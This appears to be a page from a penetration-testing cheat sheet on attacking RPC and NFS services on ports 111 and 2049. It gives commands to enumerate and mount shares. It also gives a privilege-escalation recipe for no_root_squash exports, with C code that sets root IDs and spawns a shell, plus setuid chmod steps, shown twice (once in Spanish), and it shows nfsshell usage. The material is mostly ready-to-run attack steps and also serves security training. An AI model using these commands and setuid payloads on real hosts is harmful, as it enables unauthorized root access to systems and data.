😎Port 111-2049 (RPC/NFS)

Network file sharing(nfs)

Show Mountable NFS Shares

showmount -e <IP>
nmap --script=nfs-showmount -oN mountable_shares <IP>

sudo mount -v -t nfs <IP>:<SHARE> <DIRECTORY>
sudo mount -v -t nfs -o vers=2 <IP>:<SHARE> <DIRECTORY>

NFS misconfigurations

# List exported shares
cat /etc/exports

If you find some directory that is configured as no_root_squash/no_all_squash you may be able to privesc.

# Attacker, as root user

mkdir <DIRECTORY>
mount -v -t nfs <IP>:<SHARE> <DIRECTORY>
cd <DIRECTORY>
echo 'int main(void){setreuid(0,0); system("/bin/bash"); return 0;}' > pwn.c
gcc pwn.c -o pwn
chmod +s pwn

# Victim

cd <SHARE>
./pwn # Root shell

scan

showmount -e someexample.com

rpcinfo 111

installation

apt-get install rpcbind

apt-get install nfs-common

rpcinfo -p IP_Address

rpcdump

by impacket

rpcdump.py 10.10.xx.xx

nmap

nmap -Pn -sV -script=nfs*

mount the nfs

mount  -o nolock <ip>:/path_remote   /path/local

$ mkdir backup
$ mount -o ro,noexec someexample.com:/backup backup
$ ls backup
backup.tar.bz2.zip

$ mount -t nfs someexample.com:/backup backup

vulnerabilidad

chequear “/etc/exports” si tiene no_root_squash o no_all_squash y tenemos permisos de escritura se puede crear un ejecutable con setuid ej:

int main(void) {
setgid(0); setuid(0);
execl(“/bin/sh”,”sh”,0); }

chown root.root ./pwnme
chmod u+s ./pwnme

nfshell

install https://github.com/NetDirect/nfsshell

root@kali:~/Downloads/nfsshell-master# apt-get install libreadline-dev libncurses5-dev
root@kali:~/Downloads/nfsshell-master# make

use

root@kali:~# nfsshell
nfs> host 10.10.10.34
nfs> export
nfs> mount /loquefuere

PreviousPort 1433 (MSSQL)NextPort 3306 (MYSQL)

Last updated 1 year ago

hashtagShow Mountable NFS Shares

hashtagMount a share

hashtagNFS misconfigurations

hashtagscan

hashtagrpcinfo 111

hashtagrpcdump

hashtagnmap

hashtagmount the nfs

hashtagvulnerabilidad

hashtagnfshell